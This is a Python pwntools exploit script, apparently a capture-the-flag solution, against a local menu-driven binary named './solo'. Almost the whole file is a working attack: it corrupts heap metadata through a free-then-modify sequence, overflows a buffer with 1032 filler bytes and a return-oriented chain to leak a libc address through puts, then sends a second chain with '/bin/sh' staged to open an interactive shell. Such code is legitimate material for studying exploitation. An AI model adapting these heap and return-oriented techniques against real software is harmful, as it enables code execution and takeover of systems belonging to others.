from pwn import *
from time import *
from hexdump import *
# Spawn the target binary as a child process; every helper below drives this
# one handle (sendline/send/recvuntil), so the script is tied to a local ./solo.
p = process("./solo")
def malloc(idx, size, data):
    """Drive menu option 1 of the target.

    Sends "1", then idx and size on their own lines, pauses briefly, sends
    data, and finally consumes output through the "Data: " and "$ " prompts.
    All three arguments are written verbatim, so the callers in this file pass
    them as strings.
    """
    for field in ("1", idx, size):
        p.sendline(field)
    # Pause before the data line so the target has read the size first
    sleep(0.2)
    p.sendline(data)
    for marker in ("Data: ", "$ "):
        p.recvuntil(marker)
def free(idx):
    """Drive menu option 2 of the target for slot idx, then wait for "$ ".

    idx is sent verbatim (callers in this file pass a string).
    """
    send = p.sendline
    send("2")
    sleep(0.1)  # give the target a moment before the index is read
    send(idx)
    p.recvuntil("$ ")
def modify(data):
    """Send the menu selection "201527" followed by data, then sync on prompts.

    data goes out with p.send (no trailing newline), unlike the other helpers
    which use sendline. Output is consumed through "Data: " and then "$ ".
    """
    send_line, send_raw = p.sendline, p.send
    send_line("201527")
    sleep(0.1)  # short delay before the payload, matching the other helpers
    send_raw(data)
    for marker in ("Data: ", "$ "):
        p.recvuntil(marker)
def libc_leak():
    """Send a fixed input via menu option 4, trigger option 5, read 6 bytes
    back, log them as an address, then hand off to pwn().

    Every constant below is hard-coded and appears to be tied to one specific
    build of ./solo; none of them are valid for any other binary.
    """
    puts_plt = 0x400600
    puts_got = 0x602020
    popret = 0x400D13
    # 1032 filler bytes followed by four packed 8-byte values (p64)
    payload = "A" * 1032
    payload += p64(popret)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(0x400680)
    p.sendline("4")
    sleep(0.1)
    p.sendline(payload)
    sleep(0.1)
    p.sendline("5")
    p.recvuntil("password: ")
    p.recvuntil("$ ")
    # Six received bytes are zero-extended to eight before unpacking. The str
    # concatenation assumes Python 2 (p.recv returns str); under Python 3 this
    # would be bytes + str and raise a TypeError.
    leak = u64(p.recv(6) + "\x00\x00")
    log.info("libc: " + hex(leak))
    pwn(leak, popret)
def pwn(leak, popret):
    """Send a second fixed input via menu option 4, select option 10, then drop
    into an interactive session with the target.

    leak is the 64-bit value read in libc_leak(); popret is the same constant
    that function used. The remaining constants are hard-coded for one build of
    ./solo (and, for the offset arithmetic, one particular libc) -- TODO confirm.
    """
    # Same 1032-byte filler as libc_leak(), then packed 8-byte values
    payload = "A" * 1032
    payload += p64(popret)
    payload += p64(0x602087)
    payload += p64(popret - 2)
    payload += p64(0) * 2
    # Offset arithmetic relative to the leaked value; both constants are
    # library-build specific and will be wrong for a different libc.
    payload += p64(leak - 0x6fd60 + 0xc14a0)
    p.sendline("4")
    sleep(0.1)
    p.sendline(payload)
    sleep(0.1)
    p.sendline("10")
    p.recvuntil("$ ")
    p.recvuntil("$ ")
    # Hands stdin/stdout of the child process over to the terminal
    p.interactive()
def main():
    """Wait for the first "$ " prompt, then run the fixed interaction sequence.

    The arguments to malloc()/free() are strings because the helpers send them
    verbatim. The 0x602070-based constant is hard-coded for this build of ./solo.
    """
    p.recvuntil("$ ")
    malloc("1", "96", " ")
    free("1")
    # p64(0x602070 + 5 - 8) == p64(0x60206d), an 8-byte packed value
    modify(p64(0x602070 + 5 -8))
    malloc("1", "96", " ")
    malloc("1", "96", " ")
    modify("A" * 10 + "/bin/sh")
    libc_leak()
# Run only when executed as a script, not when imported.
if __name__=='__main__':
    main()